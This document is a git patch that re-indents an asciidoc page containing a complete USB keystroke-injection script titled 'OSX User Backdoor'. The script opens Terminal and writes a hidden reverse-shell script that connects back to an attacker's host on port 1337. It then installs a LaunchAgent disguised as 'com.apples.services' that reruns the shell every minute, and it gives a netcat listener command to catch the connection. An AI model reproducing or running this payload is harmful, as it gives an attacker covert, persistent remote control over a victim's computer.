From 064a583f0e80e79c57fd0813a334c7dad46f333b Mon Sep 17 00:00:00 2001
From: Patrick Mosca <mosca1337@pacbell.net>
Date: Tue, 25 Jun 2013 18:25:51 -0700
Subject: [PATCH] Updated OSX User Backdoor (asciidoc)

---
 OSX-User-Backdoor.asciidoc | 140 ++++++++++++++++++-------------------
 1 file changed, 70 insertions(+), 70 deletions(-)

diff --git a/OSX-User-Backdoor.asciidoc b/OSX-User-Backdoor.asciidoc
index e44b655..8cbc91e 100644
--- a/OSX-User-Backdoor.asciidoc
+++ b/OSX-User-Backdoor.asciidoc
@@ -4,76 +4,76 @@
 
 
  REM Patrick Mosca
-REM A simple script for creating a persistent backdoor on OSX.
-REM Change mysite.com to your domain name or IP address
-REM Change 1337 to your port number
-REM Catch the shell with 'nc -l -p 1337'
-REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
-DELAY 1000
-GUI SPACE
-STRING terminal
-DELAY 500
-ENTER
-DELAY 500
-STRING mkdir ~/Library/.hidden
-ENTER
-DELAY 200
-STRING echo '#!/bin/bash
-ENTER
-STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
-ENTER
-STRING wait' > ~/Library/.hidden/connect.sh
-ENTER
-DELAY 500
-STRING chmod +x ~/Library/.hidden/connect.sh
-ENTER
-DELAY 200
-STRING mkdir ~/Library/LaunchAgents
-ENTER
-DELAY 200
-STRING echo '<plist version="1.0">
-ENTER
-STRING <dict>
-ENTER
-STRING <key>Label</key>
-ENTER
-STRING <string>com.apples.services</string>
-ENTER
-STRING <key>ProgramArguments</key>
-ENTER
-STRING <array>
-ENTER
-STRING <string>/bin/sh</string>
-ENTER
-STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
-ENTER
-STRING </array>
-ENTER
-STRING <key>RunAtLoad</key>
-ENTER
-STRING <true/>
-ENTER
-STRING <key>StartInterval</key>
-ENTER
-STRING <integer>60</integer>
-ENTER
-STRING <key>AbandonProcessGroup</key>
-ENTER
-STRING <true/>
-ENTER
-STRING </dict>
-ENTER
-STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-GUI q 
-
+ REM A simple script for creating a persistent backdoor on OSX.
+ REM Change mysite.com to your domain name or IP address
+ REM Change 1337 to your port number
+ REM Catch the shell with 'nc -l -p 1337'
+ REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+ DELAY 1000
+ GUI SPACE
+ STRING terminal
+ DELAY 500
+ ENTER
+ DELAY 500
+ STRING mkdir ~/Library/.hidden
+ ENTER
+ DELAY 200
+ STRING echo '#!/bin/bash
+ ENTER
+ STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
+ ENTER
+ STRING wait' > ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 500
+ STRING chmod +x ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 200
+ STRING mkdir ~/Library/LaunchAgents
+ ENTER
+ DELAY 200
+ STRING echo '<plist version="1.0">
+ ENTER
+ STRING <dict>
+ ENTER
+ STRING <key>Label</key>
+ ENTER
+ STRING <string>com.apples.services</string>
+ ENTER
+ STRING <key>ProgramArguments</key>
+ ENTER
+ STRING <array>
+ ENTER
+ STRING <string>/bin/sh</string>
+ ENTER
+ STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
+ ENTER
+ STRING </array>
+ ENTER
+ STRING <key>RunAtLoad</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING <key>StartInterval</key>
+ ENTER
+ STRING <integer>60</integer>
+ ENTER
+ STRING <key>AbandonProcessGroup</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING </dict>
+ ENTER
+ STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ GUI q 
+ 
 Catch the shell with netcat:
 
  nc -l -p 1337
\ No newline at end of file